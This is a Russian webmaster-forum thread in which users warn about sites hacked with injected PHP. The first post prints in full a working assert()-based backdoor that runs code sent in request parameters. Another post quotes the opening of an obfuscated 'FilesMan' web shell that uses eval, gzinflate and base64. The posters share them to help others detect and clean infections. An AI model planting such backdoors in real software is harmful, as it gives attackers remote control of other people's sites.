Новый тип взлома сайтов. Рекомендуется к прочтению!

(Ответов: 31, Просмотров: 7230)
Страница 1 из 4 123 Последняя
  1. Студент Аватар для seobb
    • Регистрация: 18.01.2009
    • Сообщений: 89
    • Репутация: 47
    • Webmoney BL: ?
    Относительно недавно хакеры освоили новый вид взлома ваших сайтов, для которого даже не надо заливать шелл и пр. Проставив пару строк кода они получают полный доступ к сайту - могут проставить свои ссылки или еще чего поинтереснее. В подробностях пояснить не могу т.к. не программист, то те люди, которые видели этот код сказали что он реально крут. Код как-то связан вот с этой функцией http://ru.php.net/manual/ru/function.assert.php и, грубо говоря, позволяет удалённо управлять чужим сайтом.

    Скрывать его смысла нет, т.к. кто его может применить и так про него знает, а вот всем остальным стоит проверить свои файлы. У меня оказались взломанными два проекта - на DLE (в файле engine\modules\functions.php) и на Joomla (в файле \includes\defines.php). Код просто внедряется в случайное место внутри файлов, поэтому у вас он может быть в других файлах. Айболитом не определяется.

    Код:
    $define_id = $_REQUEST['bannerid'];
    $parts_category = $_REQUEST['category'];
    $define_key = '76793908';
    $define_guard = strrev('tressa');    
    if($define_id==$define_key) { 
        $define_guard(stripslashes($parts_category));//chekings
    }
    Не знаю массовое это явление или мне только так "повезло", но решил на всякий случай предупредить всех.
    • 13

    Спасибо сказали:

    akill(14.02.2014), black-seo(14.02.2014), dekartwork(15.02.2014), eldarbal(18.02.2014), FeAlSe(17.02.2014), feuer81(08.03.2014), heisi(17.02.2014), milkyway(16.02.2014), samouschka(17.02.2014), Sanael(22.02.2014), scheff(17.02.2014), SE-0(17.02.2014), Zolang(14.02.2014),
  2. Sapienti sat Аватар для brainix
    • Регистрация: 01.01.2013
    • Сообщений: 1,925
    • Записей в дневнике: 1
    • Репутация: 817
    • Webmoney BL: ?
    Проставив пару строк кода они получают полный доступ к сайту
    Угу, шеллы заливать не надо, строки проставятся сами магическим образом.

    Откуда узнали об этой уязвимости?
    • 1

    Спасибо сказали:

    black-seo(14.02.2014),
  3. Дипломник
    • Регистрация: 30.07.2012
    • Сообщений: 151
    • Репутация: 12
    • Webmoney BL: ?
    Что-то совсем не ясно, если не заливать исполняемый код, то как внедрить вирусный...
    Совсем непонятно, поподробнее бы почитать, а то все это из мира фантастики.
    • 1

    Спасибо сказали:

    black-seo(14.02.2014),
  4. Гуру Аватар для Vasko
    • Регистрация: 23.04.2011
    • Сообщений: 639
    • Репутация: 248
    Что-то совсем не ясно, если не заливать исполняемый код, то как внедрить вирусный...
    Совсем непонятно, поподробнее бы почитать, а то все это из мира фантастики.
    Как вариант такой код может быть в шаблоне дизайна либо в движке, который был скачан где-нибудь в "левом" месте. Тогда и правда ничего дополнительного заливать не надо.
    • 1

    Спасибо сказали:

    black-seo(14.02.2014),
  5. Дипломник
    • Регистрация: 30.07.2012
    • Сообщений: 151
    • Репутация: 12
    • Webmoney BL: ?
    Vasko,такой подход известен всем давно! Но это скорее не уязвимость, а не внимательность человека, который поставил этот шаблон.
    • 0
  6. Дипломник
    • Регистрация: 22.02.2013
    • Сообщений: 241
    • Репутация: 40
    Vasko, да это было всегда, в бесплатных шаблонах чего тока не найдешь. А вот как этот код попадет в ранее не зараженный сайт непонятно. У seobb просто в шаблонах наверно был.
    • 0
  7. Гуру Аватар для Vasko
    • Регистрация: 23.04.2011
    • Сообщений: 639
    • Репутация: 248
    Vasko, да это было всегда, в бесплатных шаблонах чего тока не найдешь. А вот как этот код попадет в ранее не зараженный сайт непонятно. У seobb просто в шаблонах наверно был.
    Со всем согласен.

    ТС давайте еще подробностей.
    • 0
  8. А компот??!!
    • Регистрация: 28.11.2011
    • Сообщений: 2,067
    • Репутация: 720
    • Webmoney BL: ?
    Кстати, на dle опять начали ломать сайты, частенько стал видеть что от куда то в файле banners.php появляться не понятны скрипт, который после удаления восстанавливаться сразу же.
    • 0
  9. Гуру Аватар для STRIJ
    • Регистрация: 18.04.2011
    • Сообщений: 971
    • Репутация: 418
    • Webmoney BL: ?
    Буквально на днях обнаружил что взломали один из сайтов на ВП и с морды сразу 5 ссылок поставили. Проверил файлы по дате изменения, нашел 1 файл main.php вот неполный код

    PHP код:
    <?php
    $auth_pass 
    "f8dda7af509233889a8f3016d987be6b";
    $color "#df5";
    $default_action 'FilesMan';
    $default_use_ajax true;
    $default_charset 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx

    и несколько папок с файлами шелла. Сразу обновил движок до последней версии, сменил пароли ко всем БД на хостинге, сменил пароль к хостингу, фтп, пароль к админке сайта. Но, на след день, опять был загружен этот файл. Пишу в поддержку, там ничего поделать не могут, дают стандартные советы по безопасности... Может кто в курсе, как лезут и что делать? Наверно как-то к БД запросы делают, не знаю (
    • 0
  10. Студент Аватар для Vitaxxxa
    • Регистрация: 27.06.2012
    • Сообщений: 64
    • Репутация: 12
    STRIJ, Возможно файл сам восстанавливается через определённый промежуток времени. У меня на сайте похожая ситуация. Ссылки кто-то продавал - по всему сайту напихано было - удаляешь файл, он наследующий день опять на месте. Закрыл все файлы и папки шаблона на запись и проблема исчезла. Это конечно не лучший вариант, но как временное решение может сработать.
    • 0
Страница 1 из 4 123 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Обращение к форумчанам. К прочтению обязательно.
Обсуждение форума и ваши предложения 125 09.04.2014 08:58
SEO советы, которым рекомендуется придерживаться.
Обучающие статьи 13 14.02.2013 01:00
Правила раздела : Обязательно к прочтению
Google 0 12.11.2011 23:06
Правила раздела : Обязательно к прочтению
Апдейты Yandex 0 12.11.2011 22:55
Как перенести блог на новый хостинг. Востановление после взлома
Дайджест блогосферы 1 14.08.2011 21:42

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры